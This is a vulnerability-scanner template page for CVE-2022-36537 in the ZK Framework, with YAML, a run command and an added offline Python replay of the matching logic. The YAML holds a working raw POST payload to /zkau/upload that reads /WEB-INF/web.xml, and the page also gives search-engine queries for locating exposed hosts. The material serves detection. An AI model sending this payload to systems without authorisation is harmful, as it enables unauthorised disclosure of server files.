ZK Framework - Information Disclosure
ID: CVE-2022-36537
Severity: high
Author: theamanrawat
Tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss
Description
ZK Framework versions 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 are susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
id: CVE-2022-36537

info:
  name: ZK Framework - Information Disclosure
  author: theamanrawat
  severity: high
  description: |
    ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.
  remediation: |
    Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.
  reference:
    - https://github.com/Malwareman007/CVE-2022-36537/
    - https://tracker.zkoss.org/browse/ZK-5150
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36537
    - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36537
    cwe-id: CWE-200
    epss-score: 0.95859
    epss-percentile: 0.99401
    cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zkoss
    product: zk_framework
    shodan-query:
      - http.title:"Server backup manager"
      - http.title:"server backup manager"
    fofa-query: title="server backup manager"
    google-query: intitle:"server backup manager"
  tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss

http:
  - raw:
      - |
        GET /login.zul HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Length: 154

        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp
        Content-Disposition: form-data; name="nextURI"

        /WEB-INF/web.xml
        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - <display-name>.*</display-name>
          - |-
            <welcome-file-list>((.|
            )*)welcome-file-list>
          - xml version
          - web-app
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: dtid
        group: 1
        regex:
          - "dt:'(.*?)',cu:"
        internal: true
# digest: 4b0a00483046022100ac1da2aeba25490974a17b330976105cd9d45a52adff6d20bc7e8a2d74216891022100c585a92549ebeefe1af3de97c7057e8c4415a1c48912f0ca8d69c18243fb5ef4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability in web applications built on the ZK Framework. Run it with the Nuclei tool against a target URL; a finding is reported only when the second request returns HTTP 200 and the response body matches every regex in the matcher list (a web.xml-style document), the desktop id (dtid) having been extracted from the first /login.zul response.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-36537.yaml"
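To make the template's decision logic explicit for anyone triaging its output, the following Python is an added example (not part of the template page, the Nuclei project or the ZK Framework) that replays the two stages offline: the dtid extractor applied to a login-page body, and the status plus body-regex matchers applied to an upload response. No requests are sent; the sample bodies are constructed here, and the fragment layout of the login page (`dt:'…',cu:` inside a script) is an assumption made only so the extractor has something to match.

```python
import re

# Matcher regexes copied from the template's `matchers` section. In the YAML the
# second one is a block scalar containing a literal newline; `(.|\n)*` is the
# same alternation written on one line, so the match may span multiple lines.
BODY_REGEXES = [
    r"<display-name>.*</display-name>",
    r"<welcome-file-list>((.|\n)*)welcome-file-list>",
    r"xml version",
    r"web-app",
]

# Extractor regex from the template's `extractors` section (group 1 = dtid).
DTID_REGEX = r"dt:'(.*?)',cu:"


def extract_dtid(login_body: str):
    """Stage 1: pull the desktop id out of the /login.zul response body.

    Returns None when the page carries no `dt:'...',cu:` fragment, which is
    also the case where the template's second request could not be built.
    """
    m = re.search(DTID_REGEX, login_body)
    return m.group(1) if m else None


def upload_response_matches(status: int, body: str) -> bool:
    """Stage 2: apply `matchers-condition: and`.

    The status matcher requires 200 and the regex matcher (condition: and)
    requires every pattern to hit; any single miss means no finding.
    """
    if status != 200:
        return False
    return all(re.search(rx, body) for rx in BODY_REGEXES)


def failed_body_patterns(body: str):
    """Diagnostic helper: list the regexes that did NOT match a body, so a
    triager can see why a response was (or was not) reported."""
    return [rx for rx in BODY_REGEXES if not re.search(rx, body)]


# --- Constructed samples (not captured from any real system) -----------------

# Assumed login-page fragment; only the `dt:'...',cu:` shape matters here.
LOGIN_SAMPLE = (
    "<html><head><title>Login</title></head><body>"
    "<script>zkmx({dt:'z_example_dtid_constructed',cu:'/zkau',w:'/zkau'});</script>"
    "</body></html>"
)

# What a positive response body looks like: a web.xml-style deployment descriptor.
WEB_XML_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <display-name>Constructed Example App</display-name>
  <welcome-file-list>
    <welcome-file>index.zul</welcome-file>
  </welcome-file-list>
</web-app>
"""

# A benign 200 response: an ordinary HTML page that mentions "web-app" in prose.
BENIGN_SAMPLE = "<html><body><p>Welcome to our web-app. Please log in.</p></body></html>"


if __name__ == "__main__":
    print("dtid:", extract_dtid(LOGIN_SAMPLE))
    print("web.xml body, 200:", upload_response_matches(200, WEB_XML_SAMPLE))
    print("web.xml body, 404:", upload_response_matches(404, WEB_XML_SAMPLE))
    print("benign body, 200 :", upload_response_matches(200, BENIGN_SAMPLE))
    print("benign body misses:", failed_body_patterns(BENIGN_SAMPLE))
```

The benign case shows why the template ANDs four patterns rather than keying on `web-app` alone: a single substring hit on a normal page is not enough, and `failed_body_patterns` tells you which patterns a questionable response missed.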